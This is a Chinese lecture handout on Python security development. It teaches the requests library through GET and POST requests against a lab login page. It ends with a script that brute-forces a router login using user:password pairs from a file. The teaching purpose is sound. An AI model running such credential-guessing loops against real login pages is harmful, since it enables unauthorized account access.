python3安全开发 20230623

讲义内容：（记得看简介[脱单doge]）

python3 requests http客户端

http://175.24.116.98:2222/login.php

 python3 -m pip install requests

import requests

response=requests.get("http://175.24.116.98:2222/login.php")

print(response.status_code)

response.url

response.text

response.status_code

尝试登陆发送登录请求包

1：如何发送POST数据？

response=requests.post("http://175.24.116.98:2222/login.php")

response=requests.request(method="POST",url="http://175.24.116.98:2222/login.php")

response=requests.post("http://175.24.116.98:2222/login.php",data="username=admin&password=666666&Login=Login&user_token=7cb1b8b72e8b5b549d9749a176734cee")

line.strip()的作用：用于处理line中的无效字符（\n \r） => line.replace("\n","")

import requests

headers={

   "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0",

   "Cookie": "security=impossible; PHPSESSID=6l8bpi0sui3hc2rmqnq02l24sr"

   }

_file=open("userPasswd.txt")

userPasswd=[ line.strip() for line in _file.readlines()]

print(userPasswd)

userPasswd= [ i.split(":") for i in userPasswd ]

print(userPasswd)

for user, passwd in userPasswd:

   response=requests.post("http://192.168.1.1",

           data=f"frashnum=&action=login&Frm_Logintoken=14&Username={user}&Password={passwd}",

           headers=headers)

   print(f"[*] {response} {user} {passwd}"

   if response.status_code==200:print("login failed")

   if response.status_code==302:print("login success!")

headers是键值的形式

requests的方法中headers参数就可以指定字典

Accept-Encoding:gzip, deflate

键:值

{"Accept-Encoding":"gzip, deflate"}

cookie和token可以放一起讲的

作用都是作为临时登录令牌